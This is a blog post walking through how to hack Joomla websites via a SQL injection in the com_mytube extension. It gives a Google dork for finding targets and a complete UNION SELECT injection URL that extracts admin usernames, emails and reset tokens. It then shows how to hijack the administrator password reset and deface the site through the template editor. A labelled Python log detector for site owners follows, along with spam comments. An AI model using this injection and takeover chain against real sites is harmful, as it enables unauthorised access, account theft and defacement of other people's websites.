
Welcome to ABHIJEET VISHEN's Blogger. Register yourself for Ethical Hacking classes to be an expert and win prizes. Register yourself to learn Ethical Hacking, Hardware & Networking, HTML, DOT NET, PHP.

Tuesday, 12 June 2012

Hacking Joomla Website



Hey all, today I will tell you how to hack Joomla websites. There are different ways to hack a Joomla-based website, but today I will tell you one of the finest ways to do it.


Introduction To Joomla


Joomla as a stable full package is probably unhackable, and anyone who says they hacked Joomla itself is talking rubbish!

So how do people still hack sites that use Joomla as a content management system?

Joomla is made of components and modules, and developers outside the official team offer their own extensions to improve Joomla. The components and modules made by those other developers are the weak spots, and they are what make a site vulnerable and hackable.

Finding Exploit and Target

First of all, use this Google dork:

inurl:"option=com_mytube"

Enter this dork in the Google search box.

Next is injecting the target.

Look for a URL like this:

http://targetsite.com/index.php?option=com_mytube&Itemid=88...

Now replace the URL with something like the one below:

http://targetsite.com/index.php?option=com_mytube&Itemid=88&view=videos&type=member&user_id=62+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,concat%280x3a,username,0x3a,email,0x3a,activation%29,13,14,15,16,17,18,19,20,21,22,23,24,25+from+jos_users+where+id=62--

If the target site is vulnerable, we will see something like the image below.




In the image above we can see the username, email and activation code.

Now leave this page open and open a new page.

Admin password reset

Go to:
http://www.targetsite.com/index.php?option=com_user&view=reset
This is the standard Joomla URL for a password reset request.

                    
Now type in the email address found in the steps above and submit it.
The activation code should now be reset.

Return to the first page, refresh the page and take the new activation code.

Paste it into the token field and press Submit.

Problem with the token!

UPDATE: Joomla! 1.5.16 now hashes the reset token

If you see something like :$1$14411: after the activation code, it will not work.

Admin Login

If you have done everything correctly, the password page will load. Enter your new password.


After that go to:

http://www.targetsite.com/administrator/




Standard Joomla portal content management system

Enter the username and your new password, then click on Login.

Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML

In the Template HTML Editor, insert your defaced code, click Apply, then Save, and you are done!

Now you are successfully done.
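
For site owners, the request sequence described in this post shows up in the web server's access log: a com_mytube request whose user_id is not a plain integer, a com_user reset request, the same kind of com_mytube request again, and then /administrator/. The Python detector below is an added example, not part of the original post; the log lines, IP addresses and verdict names are constructed, and it assumes user_id is always numeric in legitimate traffic, as in the URL above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access log (Apache combined style, documentation IPs).
SAMPLE_LOG = '''\
203.0.113.7 - - [12/Jun/2012:10:01:02 +0000] "GET /index.php?option=com_mytube&Itemid=88&view=videos&type=member&user_id=62+AND+1=2+UNION+SELECT+0,1,username+from+jos_users-- HTTP/1.1" 200 5120
203.0.113.7 - - [12/Jun/2012:10:02:10 +0000] "GET /index.php?option=com_user&view=reset HTTP/1.1" 200 3301
203.0.113.7 - - [12/Jun/2012:10:02:40 +0000] "GET /index.php?option=com_mytube&Itemid=88&view=videos&type=member&user_id=62+AND+1=2+UNION+SELECT+0,1,activation+from+jos_users-- HTTP/1.1" 200 5120
203.0.113.7 - - [12/Jun/2012:10:04:00 +0000] "GET /administrator/ HTTP/1.1" 200 4100
198.51.100.23 - - [12/Jun/2012:10:05:00 +0000] "GET /index.php?option=com_mytube&Itemid=88&view=videos&type=member&user_id=62 HTTP/1.1" 200 4800
198.51.100.23 - - [12/Jun/2012:10:06:00 +0000] "GET /index.php?option=com_user&view=reset HTTP/1.1" 200 3301
192.0.2.50 - - [12/Jun/2012:10:07:00 +0000] "GET /index.php?option=com_mytube&user_id=62%27 HTTP/1.1" 500 210
'''

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(url):
    """Map one request URL to a stage of the chain in this post, or None."""
    parts = urlsplit(url)
    q = {k: v[0] for k, v in parse_qs(parts.query).items()}
    if parts.path.startswith("/administrator"):
        return "admin"
    user_id = q.get("user_id")
    if q.get("option") == "com_mytube" and user_id is not None \
            and not re.fullmatch(r"[0-9]+", user_id):
        return "sqli"   # assumption: a legitimate user_id is digits only
    if q.get("option") == "com_user" and q.get("view") == "reset":
        return "reset"
    return None

def find_chains(log_text):
    """Return {client_ip: verdict} for clients that sent a non-numeric user_id."""
    stages = {}
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        stage = classify(m.group(2)) if m else None
        if stage:
            stages.setdefault(m.group(1), []).append(stage)
    verdicts = {}
    for ip, seq in stages.items():
        if "sqli" not in seq:
            continue    # resets and admin logins alone are normal traffic
        joined = ",".join(seq)
        idx = joined.find("sqli,reset,sqli")
        if idx < 0:
            verdicts[ip] = "probe"
        else:
            verdicts[ip] = "account-takeover" if "admin" in joined[idx:] else "token-theft"
    return verdicts
```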

7 comments:

Zinavo Tech said...

One of the best features of Joomla for many companies is access to thousands of customizable extensions.

Web Developing Services said...

I cannot believe the information in this blog about hacking Joomla websites. Is this really working to hack the websites???

Bangaloreweb guru said...

Magento is the leading open source e-commerce software platform mostly trusted by developers. For effective web design to deliver excellent website for customer

Web Developing Services said...

It's very difficult to hack a Joomla website, because it is a more securable development platform.

Unknown said...

I think hacking a Joomla website is very difficult, because it has more securable things and functionality.

Sarkari Job said...

Hacking Joomla is difficult but not so difficult. We are a team of highly experienced team members who mainly design websites and applications and analyze vulnerabilities. For any assistance regarding web development, software development, application development, content writing, SEO, visit www.wavemaza.com

Unknown said...

What can be so difficult about Joomla, they said. You’ve already worked with WordPress, they said.
I was like: “Okay, I’ll do the one-click install like a boss and get everything set-up in no time.” Web Design Bangalore
